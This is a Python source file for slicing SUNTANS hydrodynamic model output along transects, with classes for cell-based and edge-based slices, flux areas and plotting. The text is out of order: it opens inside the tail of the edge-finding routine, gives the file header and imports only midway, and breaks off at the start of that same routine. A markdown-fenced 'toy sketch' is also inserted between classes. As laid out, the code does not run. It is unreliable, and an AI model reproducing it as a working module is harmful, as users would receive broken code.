"""Returns the index of the node with the minimum distance
to the line"""
# Convert all nodes to a point object
points = [Point((0.5*(self.xp[nn]+self.xp[cnode]),\
0.5*(self.yp[nn]+self.yp[cnode]))) for nn in nodes]
#lines = [LineString([(self.xp[cnode],self.yp[cnode]),\
# (self.xp[nn],self.yp[nn])]) for nn in nodes]
# Calculate the distance
dist = [line.distance(pp) for pp in points]
for ii,dd in enumerate(dist):
if dd == min(dist):
return nodes[ii]
def min_dist_angle(cnode,nodes,line):
"""Returns the index of the node with the minimum distance
to the line"""
# Convert all nodes to a point object
points = [Point((0.5*(self.xp[nn]+self.xp[cnode]),\
0.5*(self.yp[nn]+self.yp[cnode]))) for nn in nodes]
# Calculate the distance
dist = [line.distance(pp) for pp in points]
dist = np.array(dist)
# Calculate the angle along the line of the new coordinate
def calc_ang(x1,x2,y1,y2):
return np.arctan2( (y2-y1),(x2-x1) )
angle1 = [calc_ang(self.xp[cnode],self.xp[nn],\
self.yp[cnode],self.yp[nn]) for nn in nodes]
# Calculate the heading of the line near the two points
def calc_heading(P1,P2,L):
d1 = L.project(P1)
d2 = L.project(P2)
if d1 <= d2:
P3 = L.interpolate(d1)
P4 = L.interpolate(d2)
else:
P3 = L.interpolate(d2)
P4 = L.interpolate(d1)
return calc_ang(P3.xy[0][0],P4.xy[0][0],P3.xy[1][0],P4.xy[1][0])
P1 = Point((self.xp[cnode],self.yp[cnode]))
angle2 = [calc_heading(P1,Point( (self.xp[nn],self.yp[nn]) ),line) \
for nn in nodes]
angdiff = np.array(angle2) - np.array(angle1)
# Use the minimum distance unless the point is a u-turn
rank = np.argsort(dist)
for nn in range(dist.shape[0]):
if np.abs(angdiff[rank[nn]]) <= np.pi/2:
return nodes[rank[nn]]
# if they all u-turn return the min dist
if rank.size==0:
return None
else:
return nodes[rank[0]]
# Loop through and find all of the closest points to the line
MAXITER=self.MAXITER
for ii in range(MAXITER):
cnodes = connecting_nodes(nodelist[-1],nodelist)
#if method==0:
# newnode = min_dist(cnodes,self.edgeline)
if method==0:
newnode = min_dist_line(nodelist[-1],cnodes,self.edgeline)
elif method==1:
newnode = min_dist_angle(nodelist[-1],cnodes,self.edgeline)
#print 'Found new node: %d...'%newnode
if newnode is None:
break
if ii>1 and abortedge:
if self.mark[self.grd.find_edge([newnode,nodelist[-1]])] not in [0,5]:
print('Warning: reached a boundary cell. Aborting edge finding routine')
break
nodelist.append(newnode)
if newnode == endnode:
#print 'Reached end node.'
break
# Return the list of edges connecting all of the nodes
return [self.grd.find_edge([nodelist[ii],nodelist[ii+1]]) for ii in\
range(len(nodelist)-1)], nodelist
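# The node-marching loop in get_edgeindices() is essentially a greedy
# walk: from the current node, step to the unvisited neighbour judged
# closest to the target line until the end node (or a dead end) is
# reached. A toy sketch under that assumption; the graph and distance
# function are illustrative, not the grid API.

```python
def greedy_walk(neighbours, dist_to_line, start, end, maxiter=1000):
    """Follow the unvisited neighbour minimising dist_to_line until the
    end node is reached, a dead end is hit, or maxiter steps elapse."""
    path = [start]
    for _ in range(maxiter):
        candidates = [n for n in neighbours[path[-1]] if n not in path]
        if not candidates:
            break          # dead end: no unvisited neighbour
        nxt = min(candidates, key=dist_to_line)
        path.append(nxt)
        if nxt == end:
            break          # reached the target node
    return path
```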
class MultiSliceEdge(SliceEdge):
"""
Slice suntans edge-based data at all edges near a line
Used for e.g. flux calculations along a profile
"""
def __init__(self,ncfile,xpt=None,ypt=None,Npt=100,klayer=[-99],\
MAXITER=10000, **kwargs):
self.MAXITER=MAXITER
self.Npt=Npt
Spatial.__init__(self,ncfile,klayer=klayer,**kwargs)
# Load the grid as a hybridgrid
self.grd = GridSearch(self.xp,self.yp,self.cells,nfaces=self.nfaces,\
edges=self.edges,mark=self.mark,grad=self.grad,neigh=self.neigh,\
xv=self.xv,yv=self.yv)
# Find the edge indices along the line
self.update_xy(xpt,ypt)
def update_xy(self,xpts,ypts):
"""
Updates the x and y coordinate info in the object
"""
self.slices=[]
for xpt,ypt in zip(xpts,ypts):
self.xpt=xpt
self.ypt=ypt
self._getSliceCoords(kind='linear')
# List of the edge indices
j,nodelist = self.get_edgeindices(self.xslice,self.yslice,\
method=self.edgemethod, abortedge=self.abortedge)
self.j = j # Need this to calculate other quantities
self.nslice = len(self.j)
# Update the x and y axis of the slice
self.xslice=self.xp[nodelist]
self.yslice=self.yp[nodelist]
self._getDistCoords()
# Get the mask
self.calc_mask()
# Get the area and the normal
area = self.calc_area()
ne1, ne2, enormal = self.calc_normal(nodelist,j)
dx = self.df[j]
# Store all of the info as a dictionary
self.slices.append({'j':j,'nodelist':nodelist,\
'xslice':self.xslice,'yslice':self.yslice, \
'distslice':self.distslice,'area':area,'normal':enormal,'dx':dx})
# Find the unique j values and sort them
j=[]
for ss in self.slices:
j = j + ss['j']
j = np.array(j)
self.j = np.sort(np.unique(j))
# Find the index of each slice into this j array
for ii,ss in enumerate(self.slices):
ind = np.searchsorted(self.j,np.array(ss['j']))
self.slices[ii].update({'subind':ind})
self.j = self.j.tolist()
def loadData(self,**kwargs):
"""
Overloaded method of MultiEdgeSlice
loads the data and then inserts it into each slice dictionary
returns a list of 3D arrays
"""
SliceEdge.loadData(self,**kwargs)
data=[]
for ii,ss in enumerate(self.slices):
data.append(self.data[...,ss['subind']])
return data
def mean(self,phi,axis='area'):
"""
Calculate the mean of the sliced data along an axis
axis: depth, area
depth: returns the time and spatial mean. Size = (Nslice,Nk)
area: returns the area mean. Size = (Nslice,Nt)
"""
Nslice = len(self.slices)
Nt = len(self.tstep)
Nk = self.Nkmax
if axis=='area':
data = np.zeros((Nslice,Nt))
for ii,ss in enumerate(self.slices):
area_norm = ss['area']/ ss['area'].sum()
data[ii,:] = np.sum( np.sum(phi[ii]*area_norm,axis=-1),axis=-1)
elif axis=='depth':
data = np.zeros((Nslice,Nk))
for ii,ss in enumerate(self.slices):
phimean = np.mean(phi[ii],axis=0) # time mean
dx = self.df[ss['j']]
ne = len(ss['j'])
dx = np.repeat(dx[np.newaxis,:],Nk,axis=0)
dx[phimean==0.]=0
dx_sum = dx.sum(axis=-1)
dx_sum = np.repeat(dx_sum[:,np.newaxis],ne,axis=-1)
dx_norm = dx / dx_sum
data[ii,:] = np.sum( phimean*dx_norm,axis=-1)
else:
raise Exception('axis = %s not supported'%axis)
return data
#####
## Testing data
#
####
## Inputs
#ncfile = 'C:/Projects/GOMGalveston/MODELLING/ForcingSensitivity/rundata/GalvCoarse_AprMay_2010_TWRH_007.nc'
#
#xpt = np.array([ 334640.1250722 , 331097.21398258, 327837.73578013,
# 324861.69046485, 323444.526029 , 321177.06293164,
# 319334.74916504, 318059.30117277, 319618.18205221,
# 322310.79448032, 326987.43711862, 329113.18377239,
# 332939.52774918])
#
#ypt = np.array([ 3247017.02417632, 3247867.32283783, 3247867.32283783,
# 3250559.93526594, 3254386.27924273, 3259488.07121179,
# 3263456.13163216, 3267140.75916537, 3272525.98402159,
# 3275785.46222404, 3281170.68708027, 3287264.49415442,
# 3292649.71901064])
#
#outfile = 'TestSlice.mov'
####
#sun = Slice(ncfile,xpt=xpt,ypt=ypt,Npt=500)
#
#temp = sun('salt',range(23),method='linear')
#
## Test ploting
##sun.pcolors(t=1,xaxis='distslice')
##plt.show()
#
## Test animation
##sun.animate(xaxis='yslice')
##sun.saveanim(outfile)
##plt.show()
#
## Test the xtplot
##sun.xtplot(zlayer='seabed',xaxis='yslice')
##plt.show()
#
#sun.plotslice()
#plt.show()
#
#tempnodes = sun.cell2nodeki(temp[0,:],sun.cellind,0*np.ones_like(sun.cellind))
#cell_scalar = sun.loadData(variable='temp')
## Get the values at the nodes
#for kk in range(30):
# print kk
# tempnode = sun.cell2nodek(cell_scalar[kk,:],k=kk)
# Gradient routine
#dH_dx,dH_dy = sun.gradH(sun.dv,0)
##
#sun.plot(dH_dx,titlestr='')
#plt.show()
# Test out an interpolation tool
#temp = sun('salt',1)
#dT_dx,dT_dy = sun.gradH(cell_scalar[0,:],cellind=sun.cellind,k=0)
########################################################
# Deprecated functions
########################################################
# def cell2nodek(self,cell_scalar,k=0):
# """
# ### NOT USED ###
#
# Map a cell-based scalar onto a node
#
# Uses sparse matrices to do the heavy lifting
# """
# if not self.__dict__.has_key('_datasparse'):
# self._datasparse=[]
# self._Asparse=[]
# self._indsparse=[]
# for kk in range(self.Nkmax):
# self._datasparse.append(sparse.dok_matrix((self.Np,self.Nc),dtype=np.double))
# self._Asparse.append(sparse.dok_matrix((self.Np,self.Nc),dtype=np.double))
# self._indsparse.append(sparse.dok_matrix((self.Np,self.Nc),dtype=np.int))
#
# for i in range(self.Nc):
# for j in range(3):
# if kk <= self.Nk[i]:
# self._Asparse[kk][self.cells[i,j],i] = self.Ac[i]
#
# self._Asparse[kk]=self._Asparse[kk].tocoo()
#
# for i in range(self.Nc):
# for j in range(3):
# if k <= self.Nk[i]:
# self._datasparse[k][self.cells[i,j],i] = cell_scalar[i]
# #self._Asparse[k][self.cells[i,j],i] = self.Ac[i]
# #self._indsparse[k][self.cells[i,j],i] = i
#
# node_scalar = self._datasparse[k].tocoo().multiply(self._Asparse[k]).sum(axis=1) / self._Asparse[k].sum(axis=1)
#
# return np.array(node_scalar).squeeze()
# def cell2nodekold(self,cell_scalar,k=0):
# """
# Map a cell-based scalar onto a node
#
# This is calculated via a mean of the cells connected to a node(point)
# """
#
# # Area weighted interpolation
# node_scalar = [np.sum(cell_scalar[self.pnt2cellsk(k,ii)]*self.Ac[self.pnt2cellsk(k,ii)])\
# / np.sum( self.Ac[self.pnt2cellsk(k,ii)]) for ii in range(self.Np)]
# return np.array(node_scalar)
#
# def cell2nodeki(self,cell_scalar,cellind,k):
# """
# NOT WORKING
#
# ## Needs an additional lookup index to go from local cell index to the main
# grid cell index
#
# Map a cell-based scalar onto a node
#
# This returns the nodes values of the nodes connected to cells, cellind at
# vertical level, k
#
# This is useful for finding the nodal values for a limited number of points, i.e.,
# during interpolation
# """
# ind = self.cells[cellind,:]
#
# node_scalar = np.zeros_like(ind)
#
# ni = cellind.shape[0]
#
# for ii in range(ni):
# for jj in range(3):
# node_scalar[ii,jj] = np.sum(cell_scalar[self.pnt2cellsk(k[ii],ind[ii,jj])]*self.Ac[self.pnt2cellsk(k[ii],ind[ii,jj])])\
# / np.sum( self.Ac[self.pnt2cellsk(k[ii],ind[ii,jj])])
#
#
# return node_scalar
#
# def pnt2cellsk(self, k, pnt_i):
# """
# Returns the cell indices for a point, pnt_i at level, k
#
# (Stolen from Rusty's TriGrid class)
# """
# if not self.__dict__.has_key('_pnt2cellsk'):
# # build hash table for point->cell lookup
# self._pnt2cellsk = []
# for k in range(self.Nkmax):
# self._pnt2cellsk.append({})
# for i in range(self.Nc):
# for j in range(3):
# if not self._pnt2cellsk[k].has_key(self.cells[i,j]):
# self._pnt2cellsk[k][self.cells[i,j]] = []
# if k <= self.Nk[i]:
# self._pnt2cellsk[k][self.cells[i,j]].append(i)
# return self._pnt2cellsk[k][pnt_i]
#
# def pnt2cellsparse(self,pnt_i):
#
# pdb.set_trace()
# #self._pnt2cellsk = sparse.dok_matrix((self.Np,self.Nc),dtype=np.int)
# testsparse = sparse.dok_matrix((self.Np,self.Nc),dtype=np.int)
#
# for i in range(self.Nc):
# for j in range(3):
# #self._pnt2cells[self.cells[i,j],i] = i
# testsparse[self.cells[i,j],i] = i
#
# pdb.set_trace()
# -*- coding: utf-8 -*-
"""
Object for vertical slicing SUNTANS model output
Created on Wed Jul 03 12:29:14 2013
@author: mrayson
"""
import numpy as np
from datetime import datetime
import matplotlib.pyplot as plt
from scipy.interpolate import interp1d
import matplotlib.animation as animation
from shapely.geometry import LineString, Point
from sfoda.ugrid.hybridgrid import Line
from sfoda.ugrid.hybridgrid import Point as GPoint
from sfoda.ugrid.gridsearch import GridSearch
from .sunpy import Spatial
from .sunpy import unsurf
class Slice(Spatial):
"""
Suntans vertical slice class
"""
def __init__(self,ncfile,xpt=None,ypt=None,Npt=100):
Spatial.__init__(self,ncfile,klayer=[-99])
# Calculate the horizontal coordinates of the slice
self.Npt = Npt
self.nslice = Npt # For compatibility with other slice classes
if xpt is None or ypt is None:
self._getXYgraphically()
else:
self.xpt=xpt
self.ypt=ypt
self._getSliceCoords()
# Initialise the slice interpolation object
self._initInterp()
def __call__(self,variable,tstep,method='nearest'):
"""
Load the data and interpolate on the slice
"""
self.tstep=tstep
try:
self.Ntslice = len(tstep)
except TypeError:
tstep=[tstep]
self.Ntslice = 1
self.data = self.loadData(variable,method=method)
return self.data.squeeze()
def pcolorslice(self, z, t=0,xaxis='xslice',\
titlestr=None, bathyoverlay=True, colorbar=True,**kwargs):
"""
Pcolor plot of the slice
Returns a handle to the pcolor object and the colorbar
"""
# Find the colorbar limits if unspecified
#a=self.data[t,:].squeeze()
am = np.ma.array(z, mask=np.isnan(z))
if self.clim is None:
self.clim=[]
self.clim.append(np.min(am))
self.clim.append(np.max(am))
#h1 = plt.pcolor(self[xaxis],self.zslice,am,vmin=self.clim[0],vmax=self.clim[1],**kwargs)
h1 = plt.pcolormesh(self[xaxis], self.zslice, am, vmin=self.clim[0], vmax=self.clim[1],
shading='auto', **kwargs)
#h1 = plt.imshow(am,vmin=self.clim[0],vmax=self.clim[1],\
# extent=[self[xaxis].min(), self[xaxis].max(),\
# -self.z_w[-1], -self.z_w[0]], aspect='auto',\
# **kwargs)
#Overlay the bed
if bathyoverlay:
self._overlayBathy(self[xaxis][0,:],facecolor=[0.5,0.5,0.5])
# Set labels etc
plt.xlabel(self._getXlabel(xaxis))
plt.ylabel('Depth [m]')
plt.xlim([self[xaxis].min(),self[xaxis].max()])
plt.ylim([self.hslice.min(),0])
if colorbar:
axcb = plt.colorbar(h1)
else:
axcb = None
if titlestr is None:
title = plt.title(self.__genTitle())
else:
title = plt.title(titlestr)
return h1, axcb, title
def contourslice(self,z,t=0,xaxis='xslice',clevs=20,titlestr=None,bathyoverlay=True,\
filled = True, outline = False,colorbar=True,**kwargs):
"""
Filled-contour plot of the slice
Returns a handle to the pcolor object and the colorbar
"""
if not filled:
outline=True
#a=self.data[t,:].squeeze()
am = np.ma.array (z, mask=np.isnan(z))
# Find the colorbar limits if unspecified
if self.clim is None:
self.clim=[]
self.clim.append(np.min(am))
self.clim.append(np.max(am))
klayer,Nkmax = self.get_klayer()
if type(clevs)==type(1): # is integer
V = np.linspace(self.clim[0],self.clim[1],clevs)
else:
V = clevs
if filled:
h1 = plt.contourf(self[xaxis],self.zslice,am,V,vmin=self.clim[0],vmax=self.clim[1],**kwargs)
if outline:
h2 = plt.contour(self[xaxis],self.zslice,am,V,**kwargs)
#Overlay the bed
if bathyoverlay:
self._overlayBathy(self[xaxis][:],facecolor=[0.5,0.5,0.5])
# Set labels etc
plt.xlabel(self._getXlabel(xaxis))
plt.ylabel('Depth [m]')
plt.xlim([self[xaxis].min(),self[xaxis].max()])
plt.ylim([self.hslice.min(),0])
if colorbar and filled:
axcb = plt.colorbar(h1)
if titlestr is None:
plt.title(self.__genTitle())
else:
plt.title(titlestr)
if filled and not outline:
return h1,
elif not filled and outline:
return h2,
elif filled and outline:
return h1, h2,
def xtplot(self,zlayer=0,xaxis='xslice',clevs=20,titlestr=None,**kwargs):
"""
x-t contour plot of the sliced variable along vertical layer, 'zlayer'.
zlayer can be:
[0 - Nkmax] - vertical layer number
'seabed' - seabed value
'diff' - top minus bottom difference)
"""
#kbed = np.max(self.Nk[self.cellind]-1,0)
kbed = self.Nk[self.cellind]
if zlayer == 'seabed':
a= self.data[:,kbed,list(range(0,self.Npt))]
zstring = 'seabed'
elif zlayer == 'diff':
atop = self.data[:,0,:]
abot = self.data[:,kbed,list(range(0,self.Npt))]
a = atop - abot
zstring = 'Surface value - seabed value'
else:
a = self.data[:,zlayer,:]
zstring = '%3.1f [m]'%self.z_r[zlayer]
am = np.ma.array (a, mask=np.isnan(a))
if self.clim is None:
self.clim=[]
self.clim.append(np.min(am))
self.clim.append(np.max(am))
V = np.linspace(self.clim[0],self.clim[1],clevs)
h1 = plt.contourf(self[xaxis][0,:],self.time[self.tstep],am,V,vmin=self.clim[0],vmax=self.clim[1],**kwargs)
plt.xlabel(self._getXlabel(xaxis))
plt.ylabel('Time')
axcb = plt.colorbar(h1)
titlestr='%s [%s]\nLayer: %s'%(self.long_name,self.units,zstring)
plt.title(titlestr)
return h1, axcb
def plotslice(self):
"""
Plots the slice location on a map
"""
self.contourf(z=-self.dv,clevs=30,titlestr='',cmap='gist_earth')
plt.plot(self.xslice[0,:],self.yslice[0,:],'m--')
def animate(self,**kwargs):
"""
Animates the slice
"""
# Initialise the plot object
h1,cb = self.pcolorslice(**kwargs)
fig = plt.gcf()
ax = fig.gca()
title=ax.set_title("")
def updateScalar(ii):
a=self.data[ii,:].squeeze()
am = np.ma.array (a, mask=np.isnan(a))
h1.set_array(am[am.mask==False])
title.set_text(self.__genTitle(tt=self.tstep[ii]))
return (title,h1)
self.anim = animation.FuncAnimation(fig, updateScalar, frames=len(self.tstep), interval=50, blit=True)
def loadData(self, variable, method='linear'):
"""
Interpolates the data in raw data onto the slice array
"""
tstep = self.tstep
self.Ntslice = len(tstep)
slicedata = np.zeros((self.Ntslice,self.Nkmax,self.Npt))
#if method=='linear':
# cellind3d = np.repeat(self.cellind.reshape((1,self.Npt)),self.Nkmax,axis=0)
# k3d = np.arange(0,self.Nkmax)
# k3d = np.repeat(k3d.reshape((self.Nkmax,1)),self.Npt,axis=1)
for tt in range(self.Ntslice):
if self.Ntslice>1:
print('Slicing data at time-step: %d of %d...'%(tt,self.Ntslice))
self.tstep=[tstep[tt]]
rawdata = Spatial.loadData(self, variable=variable)
for kk in range(self.Nkmax):
if method == 'nearest':
slicedata[tt,kk,:] = rawdata[kk,self.cellind]
elif method == 'linear':
slicedata[tt,kk,:] = self.interpLinear(rawdata[kk,:].squeeze(),self.xslice[0,:],self.yslice[0,:],self.cellind,k=kk)
else:
raise Exception(' unknown interpolation method: %s. Must be "nearest" or "linear"'%method)
mask = self.maskslice.reshape((1,self.Nkmax,self.Npt))
mask = mask==False
mask = mask.repeat(self.Ntslice,axis=0)
slicedata[mask] = np.nan
self.tstep=tstep
return slicedata.squeeze()
def get_klayer(self):
if self.klayer[0]==-99:
klayer=list(range(self.Nkmax))
Nkmax = self.Nkmax
else:
klayer=self.klayer
Nkmax=len(klayer)
return klayer,Nkmax
def _initInterp(self):
"""
Initialise the interpolant
Finds the horizontal indices of the slice points and
constructs the 3D mask array
"""
# Find the cell index of each point along the slice
self.Tri = GridSearch(self.xp,self.yp,self.cells)
self.cellind = self.Tri(self.xslice,self.yslice)
klayer,Nkmax = self.get_klayer()
# Construct the 3D coordinate arrays
self.xslice = np.repeat(self.xslice.reshape((1,self.Npt)),self.Nkmax,axis=0)
self.yslice = np.repeat(self.yslice.reshape((1,self.Npt)),self.Nkmax,axis=0)
self.distslice = np.repeat(self.distslice.reshape((1,self.Npt)),self.Nkmax,axis=0)
self.zslice = np.repeat(-self.z_r[klayer].reshape((self.Nkmax,1)),self.Npt,axis=1)
# Construct the mask array
self.calc_mask()
# Get the bathymetry along the slice
self.hslice = -self.dv[self.cellind]
def calc_mask(self):
""" Construct the mask array"""
self.maskslice = np.zeros((self.Nkmax,self.Npt),dtype=np.bool)
for kk in range(self.Nkmax):
for ii in range(self.Npt):
if kk <= self.Nk[self.cellind[ii]]:
self.maskslice[kk,ii]=True
def _getSliceCoords(self,kind=3):
"""
Fits a spline through the input slice points
# Kind is the linear interpolation type
"""
n = self.xpt.shape[0]
t = np.linspace(0,1,n)
tnew = np.linspace(0,1,self.Npt)
if n <= 3:
kind='linear' # A cubic spline needs at least 4 points
Fx = interp1d(t,self.xpt,kind=kind)
Fy = interp1d(t,self.ypt,kind=kind)
self.xslice = Fx(tnew)
self.yslice = Fy(tnew)
self._getDistCoords()
def _getDistCoords(self):
# Calculate the distance along the slice
self.distslice = np.zeros_like(self.xslice)
self.distslice[1:] = np.sqrt( (self.xslice[1:]-self.xslice[:-1]) **2 + \
(self.yslice[1:]-self.yslice[:-1]) **2 )
self.distslice = self.distslice.cumsum()
def _getXYgraphically(self):
"""
Plot a map of the bathymetry and graphically select the slice points
"""
self.contourf(z=-self.dv,clevs=30,titlestr='Select points for slice on map\nRight-click to finish; middle-click to remove last point.',cmap='gist_earth')
x = plt.ginput(n=0,timeout=0,mouse_pop=2,mouse_stop=3)
# Find the location of the slice
xy = np.array(x)
self.xpt=xy[:,0]
self.ypt=xy[:,1]
self._getSliceCoords()
plt.plot(self.xslice,self.yslice,'m--')
plt.title('Close figure to continue...')
plt.show()
def _getXlabel(self,xaxis):
if xaxis == 'xslice':
xlab = 'Easting [m]'
elif xaxis == 'yslice':
xlab = 'Northing [m]'
elif xaxis == 'distslice':
xlab = 'Distance along transect [m]'
else:
raise Exception(' unknown "xaxis" value %s.\n Must be one of "xslice", "yslice" or "distslice".'%xaxis)
return xlab
def _overlayBathy(self,xdata,**kwargs):
"""
Pretty bathymetry overlay
"""
plt.fill_between(xdata,self.hslice,y2=self.hslice.min(),zorder=1e6,**kwargs)
def __genTitle(self,tt=None):
if tt is None:
if isinstance(self.tstep, int):
tt = self.tstep
else:
tt = self.tstep[0]
titlestr='%s [%s]\nTime: %s'%(self.long_name,self.units,\
datetime.strftime(self.time[tt],'%d-%b-%Y %H:%M:%S'))
return titlestr
class SliceEdge(Slice):
"""
Slice suntans edge-based data at all edges near a line
Used for e.g. flux calculations along a profile
"""
edgemethod=1
abortedge=False
def __init__(self,ncfile,xpt=None,ypt=None,klayer=[-99],\
MAXITER=10000, Npt=100, **kwargs):
self.Npt=Npt
self.MAXITER=MAXITER
Spatial.__init__(self,ncfile,klayer=klayer,**kwargs)
# Load the grid as a hybridgrid
self.grd = GridSearch(self.xp,self.yp,self.cells,nfaces=self.nfaces,\
edges=self.edges,mark=self.mark,grad=self.grad,neigh=self.neigh,\
xv=self.xv,yv=self.yv)
# Find the edge indices along the line
self.update_xy(xpt,ypt)
def update_xy(self,xpt,ypt):
"""
Updates the x and y coordinate info in the object
"""
if xpt is None or ypt is None:
self._getXYgraphically()
else:
self.xpt=xpt
self.ypt=ypt
self._getSliceCoords(kind='linear')
# List of the edge indices
self.j,self.nodelist =\
self.get_edgeindices(self.xslice,self.yslice,\
method=self.edgemethod, abortedge=self.abortedge)
self.nslice = len(self.j)
# Update the x and y axis of the slice
self.xslice=self.xp[self.nodelist]
self.yslice=self.yp[self.nodelist]
self.zslice = -self.z_r
self._getDistCoords()
self.edgexy()
# The x and y arrays need to be resized
self.xslice = 0.5*(self.xslice[1:]+self.xslice[0:-1])
self.yslice = 0.5*(self.yslice[1:]+self.yslice[0:-1])
self.distslice = 0.5*(self.distslice[1:]+self.distslice[0:-1])
# Get the mask
self.calc_mask()
# Calculate the area
self.area = self.calc_area()
# Calculate the normal
self.ne1, self.ne2, self.enormal = self.calc_normal(self.nodelist,self.j)
# Get the bathymetry along the slice
de = self.get_edgevar(self.dv)
self.hslice = -de[self.j]
def loadData(self,variable=None,setunits=True,method='mean'):
"""
Load the specified suntans variable data as a vector
Overloaded method for edge slicing - it is quicker to load time step by
time step in a loop.
method: edge interpolation method - 'mean', 'max'
"""
nc = self.nc
if variable is None:
variable=self.variable
if setunits:
try:
self.long_name = nc.variables[variable].long_name
self.units= nc.variables[variable].units
except (KeyError, AttributeError):
self.long_name = ''
self.units=''
j=self.j
# Check if cell-centered variable
is3D=True
isCell=False
if self.hasVar(variable):
if self.hasDim(variable,self.griddims['Ne']):
isCell=False
elif self.hasDim(variable,self.griddims['Nc']):
isCell=True
# Check if 3D
if self.hasDim(variable,self.griddims['Nk']) or\
self.hasDim(variable,'Nkw'): # 3D
is3D=True
else:
is3D=False
else:
isCell=True
if isCell:
nc1 = self.grad[j,0].copy()
nc2 = self.grad[j,1].copy()
# check for edges (use logical indexing)
ind1 = nc1==-1
nc1[ind1]=nc2[ind1]
ind2 = nc2==-1
nc2[ind2]=nc1[ind2]
klayer,Nkmax = self.get_klayer()
# Note: hasDim fails for derived variables like 'area' that are not in the file
if self.hasDim(variable,'Nkw'): # vertical velocity
Nkmax +=1
def ncload(nc,variable,tt):
if variable=='agemean':
ac = nc.variables['agec'][tt,klayer,:]
aa = nc.variables['agealpha'][tt,klayer,:]
tmp = aa/ac
tmp[ac<1e-12]=0.
return tmp/86400.
elif variable=='area':
eta = nc.variables['eta'][tt,:]
dzf = Spatial.getdzf(self,eta) # use the base-class method directly
return self.df*dzf
else:
if nc.variables[variable].ndim==1:
return nc.variables[variable][:]
elif self.hasDim(variable,self.griddims['Nk']): # 3D
return nc.variables[variable][tt,klayer,:]
else:
return nc.variables[variable][tt,:]
# For loop where the data is extracted
nt = len(self.tstep)
ne = len(self.j)
if is3D:
self.data = np.zeros((nt,Nkmax,ne))
else:
self.data = np.zeros((nt,ne))
for ii,tt in enumerate(self.tstep):
#tmp=nc.variables[variable][tt,:,:]
tmp = ncload(nc,variable,tt)
# Return the mean for cell-based variables
if isCell:
if method == 'mean':
self.data[ii,...] = 0.5*(tmp[...,nc1]+tmp[...,nc2])
elif method == 'max':
tmp2 = np.dstack((tmp[...,nc1], tmp[...,nc2]))
self.data[ii,...] =tmp2.max(axis=-1)
else:
self.data[ii,...]=tmp[...,self.j]
# Average 'w'
if self.hasDim(variable,'Nkw'):
self.data = self.data[:,1:]*0.5 + self.data[:,0:-1]*0.5
# Mask 3D data
if is3D:
maskval=0
self.data[ii,self.maskslice]=maskval
#fillval = 999999.0
#self.mask = self.data==fillval
#self.data[self.mask]=0.
self.data[self.data==self._FillValue]=0.
self.data = self.data.squeeze()
return self.data
def edgexy(self):
"""
Nx2 vectors outlining each cell in the edge slice
"""
def closePoly(xp,node,k):
return np.array([ [xp[node],\
xp[node+1],xp[node+1], xp[node],xp[node]],\
[-self.z_w[k],-self.z_w[k],-self.z_w[k+1],-self.z_w[k+1],-self.z_w[k]],\
]).T
self.xye = [closePoly(self.distslice,jj,kk) for kk in range(self.Nkmax) \
for jj in range(len(self.j)) ]
def calc_normal(self,nodelist,j):
"""
Calculate the edge normal
"""
# Calculate the unit normal along the edge
P1 = GPoint(self.xp[nodelist][0:-1],self.yp[nodelist][0:-1])
P2 = GPoint(self.xp[nodelist][1:],self.yp[nodelist][1:])
L = Line(P1,P2)
ne1,ne2 = L.unitnormal()
# Sign (+/-1) of the grid edge normal relative to the slice direction
enormal = np.round(self.n1[j]*ne1 +\
self.n2[j]*ne2)
return ne1,ne2,enormal
def mean(self,phi,axis='time'):
"""
Calculate the mean of the sliced data along an axis
axis: time, depth, area
time : returns the time mean. size= (Nk, Nj)
depth: returns the time and spatial mean. Size = (Nk)
area: returns the area mean. Size = (Nt)
"""
if axis=='time':
return np.mean(phi,axis=0)
elif axis=='area':
area_norm = self.area / self.area.sum()
return np.sum( np.sum(phi*area_norm,axis=-1),axis=-1)
elif axis=='depth':
dx = self.df[self.j]
dx_norm = dx / dx.sum()
return np.sum( self.mean(phi,axis='time')*dx_norm,axis=-1)
def plot(self,z,titlestr=None,**kwargs):
"""
Pcolor plot of the slice
"""
if self.clim is None:
self.clim=[]
self.clim.append(np.min(z))
self.clim.append(np.max(z))
# Set the xy limits
xlims=[self.distslice.min(),self.distslice.max()]
ylims=[-self.z_w.max(),-self.z_w.min()]
self.fig,self.ax,self.patches,self.cb=unsurf(self.xye,z.ravel(),xlim=xlims,ylim=ylims,\
clim=self.clim,**kwargs)
self.ax.set_aspect('auto')
def plotedges(self,color='m',**kwargs):
"""
plot for testing
"""
self.plotmesh()
#plt.plot(self.edgeline.xy,'r')
for ee in self.j:
plt.plot([self.xp[self.edges[ee,0]],self.xp[self.edges[ee,1]]],\
[self.yp[self.edges[ee,0]],self.yp[self.edges[ee,1]]],color=color,\
**kwargs)
def calc_area(self,eta=None):
"""
Calculate the cross-sectional area of each face
"""
if eta is None:
eta = np.zeros((self.nslice,)) # Assumes the free-surface is zero
dzf = self.getdzf(eta)
area = dzf * self.df[self.j]
area[self.maskslice]=0
return area
def getdzf(self,eta):
""" Get the cell thickness along each edge of the slice"""
#dzf = Spatial.getdzf(self,eta,j=self.j)
dzf = np.repeat(self.dz[:,np.newaxis],len(self.j), axis=1)
dzf[self.maskslice]=0
return dzf
def get_width(self):
"""
Calculate the width of each edge as a 2d array
Missing cells are masked
"""
df = self.df[self.j]
width = np.ones((self.Nkmax,1)) * df[np.newaxis,:]
width[self.maskslice]=0
return width
def calc_mask(self):
""" Construct the mask array"""
klayer,Nkmax=self.get_klayer()
self.maskslice = np.zeros((Nkmax,len(self.j)),dtype=bool)
for k,kk in enumerate(klayer):
for ii,j in enumerate(self.j):
if kk >= self.Nke[j]:
self.maskslice[k,ii]=True
def get_edgeindices(self,xpt,ypt,method=1, abortedge=True):
"""
Return the indices of the edges (in order) along the line
method - method for line finding algorithm
0 - closest point to line
1 - closest point without doing a u-turn
abortedge - Set true to abort when slice hits a boundary
"""
# Load the line as a shapely object
#edgeline = asLineString([self.xslice,self.yslice])
Npt = xpt.shape[0]
xyline = [(xpt[ii],ypt[ii]) for ii in range(Npt)]
self.edgeline = LineString(xyline)
# Find the nearest grid Node to the start and end of the line
xy_1 = np.vstack((xpt[0],ypt[0])).T
node0 = self.grd.findnearest(xy_1)
xy_2 = np.vstack((xpt[-1],ypt[-1])).T
endnode = self.grd.findnearest(xy_2)
# This is the list containing all edge nodes
nodelist = [node0[0]]
def connecting_nodes(node,nodelist):
""" finds the nodes connecting to the node"""
edges = self.grd.pnt2edges(node)
cnodes = []
for ee in edges:
for nn in self.grd.edges[ee]:
if nn not in nodelist:
cnodes.append(nn)
return cnodes
def min_dist(nodes,line):
"""Returns the index of the node with the minimum distance
to the line"""
# Convert all nodes to a point object
